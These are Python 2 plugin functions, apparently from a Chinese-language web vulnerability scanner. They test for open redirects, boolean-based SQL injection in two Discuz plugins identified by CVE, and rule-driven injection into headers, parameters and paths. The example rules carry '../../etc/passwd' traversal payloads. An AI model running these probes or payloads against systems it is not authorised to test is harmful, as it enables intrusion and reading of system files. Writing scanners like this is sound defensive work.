def run_url(http, ob, item): header = { "Host": ob['domain'], "Connection": "keep-alive", "Pragma": "no-cache", "Cache-Control": "no-cache", "Referer": item['refer'], "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", # "Cookie": ob.get('cookie') } try: path = item['url'] method = item['method'] timeout = ob.get('webTimeout') http = Http(timeout=timeout) url_parse = urlparse(path) netloc = url_parse.netloc source_ip = ob.get('source_ip') if source_ip: netloc = source_ip query_dict = post_query2dict(path) result = [] for key in query_dict.keys(): url2 = getDomain(query_dict[key]) print url2 if url2: query_dict[key] = 'http://openresty.org/cn/' print(query_dict[key]) new_query = dict2query(query_dict) new_url = "%s://%s%s?%s" % (url_parse.scheme, netloc, url_parse.path, new_query) # print new_url res, content = http.request(new_url, 'GET', headers=header) c = re.search('''OpenResty 是一个基于 NGINX 和 LuaJIT 的 Web 平台。''', content) if c: response = getResponse(res, content, 'OpenResty 是一个基于 NGINX 和 LuaJIT 的 Web 平台。') request = getRequest(path, 'POST', headers=header, domain=ob['domain']) detail = "存在任意网址跳转漏洞" result.append( getRecord(ob, path, ob['level'], detail, request, response)) return result except Exception, e: logger.error("File:PageredirectsScript_yd.py, run_url function :%s" % (str(e))) return result
def returnInjectResult( self, url='', confirm=0, detail='', response={ 'httpcode': 0, 'url': '', 'method': '', 'request_headers': {}, 'request_body': '', 'response_headers': {}, 'response_body': '' }, output='', payload=''): ''' 检测到注入结果后,格式化输出 输入信息如下: url,请求的url confirm,确认漏洞存在,值为 0/1 detail,漏洞描述详情 response,http请求信息,包括5项,分别为: httpcode http请求状态码 url 请求的URL method 请求方式 request_headers 请求头 字典格式 request_body 请求体 response_headers 响应头 字典格式 response_body 响应体 output,页面输出的额外信息,用于个别插件存储部分信息 输出信息如下: url,请求的url confirm,确认漏洞存在,值为 0/1 detail,漏洞描述 httpcode,http请求状态码 request,http请求实体 response,响应实体 output,页面输出的额外信息,用于个别插件存储部分信息 payload,构造攻击的payload ''' formatResult = {} formatResult['url'] = confirm formatResult['confirm'] = confirm formatResult['detail'] = detail formatResult['httpcode'] = response['httpcode'] formatResult['request'] = getRequest(response['url'], response['method'].upper(), response['request_headers'], response['request_body']) formatResult['response'] = getResponse(response['response_headers'], response['response_body']) formatResult['output'] = output formatResult['payload'] = payload return formatResult
def run_domain(http, ob): ''' 未启用,待写 CVE-2009-4621 CNNVD-201001-184 Patching JangHu Inn插件'forummission.php' SQL注入漏洞 Discuz!中的JiangHu Inn plugin 1.1及其早期版本中存在SQL注入漏洞,远程攻击者可以借助 forummission.php的显示操作中的id参数执行任意SQL指令。 CVSS分值: 7.5 [严重(HIGH)] CWE-89 [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)] ''' scheme = ob['scheme'] domain = ob['domain'] path = ob.get('path', '/') header = {'Host': domain} source_ip = ob.get('source_ip') if source_ip: domain = source_ip result = [] try: if '/' != path[-1]: path += '/' true_load, false_load = num_type() query_t = 'index=show&id=24%s' % true_load query_f = 'index=show&id=24%s' % false_load url_t = '%s://%s%s%s?%s' % (scheme, domain, path, 'forummission.php', query_t) url_f = '%s://%s%s%s?%s' % (scheme, domain, path, 'forummission.php', query_f) res_t, content_t = http.request(url=url_t, method='GET', headers=header) res_f, content_f = http.request(url=url_f, method='GET', headers=header) status_t = res_t.get('status', '0') status_f = res_f.get('status', '0') similar = check_page_similar(status1=status_t, content1=content_t, status2=status_f, content2=content_f) if not similar: detail = "检测到Patching JangHuInn插件'forummission.php' SQL注入漏洞" request = getRequest(url_f, domain=ob['domain']) response = getResponse(res_f, content_f) result.append( getRecord(ob, url_f, ob['level'], detail, request, response)) except Exception, e: logger.error( "File:Discuz_JiangHu_Inn_1_forummission_php_sql_inject.py, run_domain function:%s" % (str(e)))
def run_domain(http, ob): ''' 未启用,待写 CVE-2009-3185 CNNVD-200909-287 Discuz! Crazy Star plugin 2.0版本的plugin.php中存在SQL注入漏洞。远程认证用户可以借助一个核查操作中的fmid参数,执行任意SQL指令。 CVSS分值: 7.5 [严重(HIGH)] CWE-89 [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)] ''' scheme = ob['scheme'] domain = ob['domain'] path = ob.get('path', '/') header = {'Host': domain} source_ip = ob.get('source_ip') if source_ip: domain = source_ip result = [] try: if '/' != path[-1]: path += '/' true_load, false_load = num_type() query_t = 'identifier=family&module=family&action=view&fmid%s' % true_load query_f = 'identifier=family&module=family&action=view&fmid%s' % false_load url_t = '%s://%s%s%s?%s' % (scheme, domain, path, 'plugin.php', query_t) url_f = '%s://%s%s%s?%s' % (scheme, domain, path, 'plugin.php', query_f) res_t, content_t = http.request(url=url_t, method='GET', headers=header) res_f, content_f = http.request(url=url_f, method='GET', headers=header) status_t = res_t.get('status', '0') status_f = res_f.get('status', '0') similar = check_page_similar(status1=status_t, content1=content_t, status2=status_f, content2=content_f) if not similar: detail = "检测到Discuz! Crazy Star plugin 2.0版本的plugin.php中存在SQL注入漏洞" request = getRequest(url_f, domain=ob['domain']) response = getResponse(res_f, content_f) result.append( getRecord(ob, url_f, ob['level'], detail, request, response)) except Exception, e: logger.error( "File:Discuz_Crazy_Star_2_plugin_php_sql_inject.py, run_domain function:%s" % (str(e)))
def run_url(http, ob, item): result_list = [] url = item['url'] params = item['params'] method = item['method'] task_id = ob['taskId'] # rules = [{"judge": {"similar": {"mode": "less_than", "value": 0.6}, "http_code": {"mode": "equal", "value": ["200", "999"]}}, # "inj_way": "replace", "inj_point": "", "inj_value": "../../../../../../../../../../../../../etc/passwd", "area": "params"},] # 从数据库读取task的规则列表(取除path之外的规则) rules = get_rules(task_id) # rule example: ''' { 'area':'params', # inj_types: headers, path, params(body/query) 'inj_point':'(path|page|download)', 'inj_value':['../../../../../etc/passwd'], 'inj_way':'replace', 'judge':{'http_code':'200','keyword':'(root|bin|nobody):'} } ''' header = { "Host": ob['domain'], "Connection": "keep-alive", "Pragma": "no-cache", "Cache-Control": "no-cache", "Referer": item['refer'], "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", # "Cookie": ob.get('cookie') } # http = Http(timeout=ob['webTimeout']) if len(rules) == 0: pass else: url_parse = urlparse(url) scheme = url_parse.scheme domain = url_parse.netloc path = url_parse.path query = url_parse.query source_ip = ob.get('source_ip') if source_ip: domain = source_ip if query: url = "%s://%s%s?%s" % (scheme, domain, path, query) else: url = "%s://%s%s" % (scheme, domain, path) for rule in rules: res_method = 'HEAD' if rule.get('if_head') else method.upper() if rule.get('judge').get('keyword') or rule.get('judge').get( 'content') or rule.get('judge').get('similar'): redirects = 5 else: http = HttpRequest({'timeout': 10, 'follow_redirects': False}) redirects = 0 res_method = 'HEAD' # header injection if 'header' == rule.get('area'): new_header_list = header_inject(header, rule.get('inj_point'), rule.get('inj_value'), rule.get('inj_way')) for new_header in new_header_list: if 'post' == method: params = post_params2str(params) try: res, content = http.request(url, res_method, params, new_header, redirections=redirects) # # ---------- verify 404 page by lichao if page_similar(res.get('status'), content, ob.get('404_page')): continue # # ----------- verify waf page by lichao if page_similar(res.get('status'), content, ob.get('waf_page')): continue # # ----------- # # get normal_res first if content compare is necessary if rule.get('judge').get('similar'): normal_res, normal_cont = http.request( url, res_method, params, header) else: normal_res = None normal_cont = None # 根据http请求结果判断是否有漏洞 if result_judge(normal_res, normal_cont, res, content, **rule.get('judge')): response = getResponse(res, content) request = getRequest(url, res_method, headers=new_header, body=params, domain=ob['domain']) detail = "注入规则:" + json.dumps(rule) ob['vulId'] = rule.get('vul_id') result_list.append( getRecord(ob, url, ob['level'], detail, request, response)) except Exception, e: logger.exception( "File:rule_scan_script_url.py,rule_id:%s , run_domain function :%s" % (rule.get('rule_id'), str(e))) pass # params injection include query&body elif 'params' == rule.get('area'): try: if url_parse.query: new_query_list = query_inject(url_parse.query, rule.get('inj_point'), rule.get('inj_value'), rule.get('inj_way')) for query in new_query_list: new_url = urlunparse( (url_parse.scheme, domain, url_parse.path, '', query, '')) if 'post' == method: new_params = post_params2str(params) try: res, content = http.request(new_url, res_method, body=new_params, headers=header) # print res # # ---------- verify 404 by lichao if page_similar(res.get('status'), content, ob.get('404_page')): continue # # ----------- verify waf page by lichao if page_similar(res.get('status'), content, ob.get('waf_page')): continue # # get normal_res first if content compare is necessary if rule.get('judge').get('similar'): normal_res, normal_cont = http.request( url, res_method, params, header) else: normal_res = None normal_cont = None # 根据http请求结果判断是否有漏洞 if result_judge(normal_res, normal_cont, res, content, **rule.get('judge')): response = getResponse(res, content) request = getRequest(new_url, res_method, headers=header, body=params, domain=ob['domain']) detail = "注入规则:" + json.dumps(rule) ob['vulId'] = rule.get('vul_id') result_list.append( getRecord(ob, new_url, ob['level'], detail, request, response)) except Exception, e: logger.exception( "File:rule_scan_script_url.py,rule_id:%s , run_domain function :%s" % (rule.get('rule_id'), str(e))) pass if params: if 'get' == method: new_query_list = query_inject( params, rule.get('inj_point'), rule.get('inj_value'), rule.get('inj_way')) for query in new_query_list: new_url = url + "?" + query try: res, content = http.request(new_url, res_method, body=None, headers=header) # print res # # ---------- verify 404 by lichao if page_similar(res.get('status'), content, ob.get('404_page')): continue # # ----------- verify waf page by lichao if page_similar(res.get('status'), content, ob.get('waf_page')): continue # # get normal_res first if content compare is necessary if rule.get('judge').get('similar'): normal_res, normal_cont = http.request( url, res_method, body=None, headers=header) else: normal_res = None normal_cont = None # 根据http请求结果判断是否有漏洞 if result_judge(normal_res, normal_cont, res, content, **rule.get('judge')): response = getResponse(res, content) request = getRequest( new_url, res_method, headers=header, body=params, domain=ob['domain']) detail = "注入规则:" + json.dumps(rule) ob['vulId'] = rule.get('vul_id') result_list.append( getRecord(ob, new_url, ob['level'], detail, request, response)) except Exception, e: logger.exception( "File:rule_scan_script_domain.py,rule_id:%s , run_domain function :%s" % (rule.get('rule_id'), str(e))) pass else: body_dict = json.loads(params) new_body_list = body_inject( body_dict, rule.get('inj_point'), rule.get('inj_value'), rule.get('inj_way')) if new_body_list: for body in new_body_list: # new_url = urlunparse(url.scheme, url.netloc, url.path, params='', # query=url.query, fragment='') try: res, content = http.request( url, res_method, body=body, headers=header, redirections=redirects) # # ---------- verify 404 by lichao if page_similar( res.get('status'), content, ob.get('404_page')): continue # # ----------- verify waf page by lichao if page_similar( res.get('status'), content, ob.get('waf_page')): continue # # get normal_res first if content compare is necessary if rule.get('judge').get('similar'): if 'post' == method: new_params = post_params2str( params) normal_res, normal_cont = http.request( url, res_method, new_params, header) else: normal_res = None normal_cont = None # 根据http请求结果判断是否有漏洞 if result_judge( normal_res, normal_cont, res, content, **rule.get('judge')): response = getResponse( res, content) request = getRequest( url, res_method, headers=header, body=params, domain=ob['domain']) detail = "注入规则:" + json.dumps(rule) ob['vulId'] = rule.get('vul_id') result_list.append( getRecord( ob, url, ob['level'], detail, request, response)) except Exception, e: logger.exception( "File:rule_scan_script_domain.py,rule_id:%s , run_domain function :%s" % (rule.get('rule_id'), str(e))) pass
def run_domain(http, ob): scheme = ob['scheme'] domain = ob['domain'] header = {'Host': domain} source_ip = ob.get('source_ip') if source_ip: domain = source_ip path = ob['path'] result_list = [] task_id = ob['taskId'] # 从数据库读取task的规则列表(取除path之外的规则) # rules = [{"judge": {"similar": {"mode": "less_than", "value": 0.6}, "http_code": {"mode": "equal", "value": ["200", "999"]}}, # "inj_way": "replace", "inj_point": "", "inj_value": "../../../../../../../../../../../../../../../etc/passwd", "area": "params"},] rules = get_rules(task_id) # rule example: ''' { 'area':'query', # 注入区域 'inj_point':'(path|page|download)', # 注入点 'inj_value':'../../../../../etc/passwd', # 注入值 'inj_way':'replace', # 注入方式 'judge':{'http_code':'200','keyword':'(root|bin|nobody):'} # 判断条件 } ''' if len(rules) == 0: pass else: timeout_count = 0 for rule in rules: if timeout_count > 80: break else: n = timeout_count / 10 + 1 timeout = 10 / n method = 'HEAD' if rule.get('if_head') else 'GET' if rule.get('judge').get('keyword') or rule.get('judge').get( 'content') or rule.get('judge').get('similar'): redirects = 5 http = HttpRequest({ 'timeout': timeout, 'follow_redirects': True }) else: http = HttpRequest({ 'timeout': timeout, 'follow_redirects': False }) redirects = 0 method = 'HEAD' # start path injection try: new_path_list = path_inject(path, rule.get('inj_value'), rule.get('inj_way')) for new_path in new_path_list: url = "%s://%s%s" % (scheme, domain, path) new_url = "%s://%s%s" % (scheme, domain, new_path) # http = Http(timeout=ob['webTimeout']) try: import time t1 = time.time() res, content = http.request(new_url, method, redirections=redirects, headers=header) # # ---------- verify 404 page by lichao if page_similar(res.get('status'), content, ob.get('404_page')): continue # # ----------- verify waf page by lichao if page_similar(res.get('status'), content, ob.get('waf_page')): continue # # ----------- if rule.get('judge').get('similar'): normal_res, normal_cont = http.request( url, method, headers=header) else: normal_res = None normal_cont = None # 根据http请求结果判断是否有漏洞 judge = rule.get('judge') if result_judge(normal_res, normal_cont, res, content, **judge): response = getResponse(res, content) request = getRequest(new_url, domain=ob['domain']) detail = "注入规则:" + json.dumps(rule) ob['vulId'] = rule.get('vul_id') result_list.append( getRecord(ob, new_url, ob['level'], detail, request, response, "")) # result.append(getRecord(ob,url,ob['level'],detail,request,response,output)) except Exception, e: logger.exception( "File:rule_scan_script_domain.py,rule_id:%s , run_domain function :%s" % (rule.get('rule_id'), str(e))) timeout_count += 1 t2 = time.time() print 'timeout_count:::::::', timeout_count, t2 - t1 pass except Exception, e: # print e logger.exception( "File:rule_scan_script_domain.py,rule_id:%s , run_domain function :%s" % (rule.get('rule_id'), str(e)))